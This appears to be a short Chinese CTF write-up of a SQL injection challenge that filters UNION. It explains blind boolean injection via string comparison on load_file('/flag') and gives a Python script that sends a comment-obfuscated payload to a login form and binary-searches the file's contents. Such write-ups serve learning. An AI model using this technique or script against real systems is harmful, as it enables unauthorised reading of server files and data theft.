题目过滤了union 和大量的sql函数,本意是想让人读文件,当时心太急了没做出来,现在复习一下,脚本很简单,利用的是ascii的字符串比较 如
select load_file('/flag')>='A'
select load_file('/flag')>='AB'
select load_file('/flag')>='ABC'
select load_file('/flag')>='ABCD'
简单利用这个逻辑可以写出一个二分的做法
直接看代码吧
import requests
url = 'http://localhost/index.php'
def func(x):x = x.replace(' ','/**/')return x
flag = ''
def check(mid,mystr):username = """hack' or binary (select load_file('/flag'))>='{0}'#"""username = func(username)username = username.format(mystr)password = 'hack'r = requests.post(url=url,data={
'username':username,'password':password}) return 'success' in r.contentfor i in range(1,20):left = 0right = 255while left < right:mid = (left+right+1)>>1if check(mid,flag+chr(mid)):left = midelse:right = mid-1flag += chr(left)print flag